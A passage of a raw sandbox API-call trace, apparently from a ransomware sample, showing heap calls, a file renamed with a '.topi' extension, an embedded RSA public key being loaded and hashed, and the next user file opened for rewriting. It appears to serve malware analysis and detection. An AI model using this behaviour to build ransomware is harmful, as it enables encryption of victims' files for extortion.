hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9150 | out: hHeap=0x680000) returned 1 [0094.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3e38 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.689] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x11915, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x11915, lpOverlapped=0x0) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0094.689] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1191a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.689] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.690] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.690] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.690] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.690] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.690] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.690] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.690] CloseHandle (hObject=0x6a8) returned 1 [0094.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0094.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.703] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W3jMO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w3jmo.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W3jMO.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w3jmo.gif.topi")) returned 1 [0094.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.704] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.705] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab68e340, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x90a3c590, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0x90a3c590, ftLastWriteTime.dwHighDateTime=0x1d5b8ae, nFileSizeHigh=0x0, nFileSizeLow=0x2663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wQWF.mp3", cAlternateFileName="")) returned 1 [0094.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.705] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wQWF.mp3") returned=".mp3" [0094.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wQWF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wqwf.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.706] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=9827) returned 1 [0094.706] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.709] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x263d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.709] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.710] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.710] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x2663, lpOverlapped=0x0) returned 1 [0094.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.711] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.711] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.712] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.712] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.712] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.712] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.712] GetLastError () returned 0x0 [0094.712] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.712] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.712] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.712] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.712] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2660) returned 0x99f52d8 [0094.712] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3e38 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9150 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3e80 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9168 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91b0 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.713] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d91b0 [0094.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9198 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.714] GetCurrentThreadId () returned 0x8c4 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e2090 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.715] GetCurrentThreadId () returned 0x8c4 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.715] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.715] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91b0 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 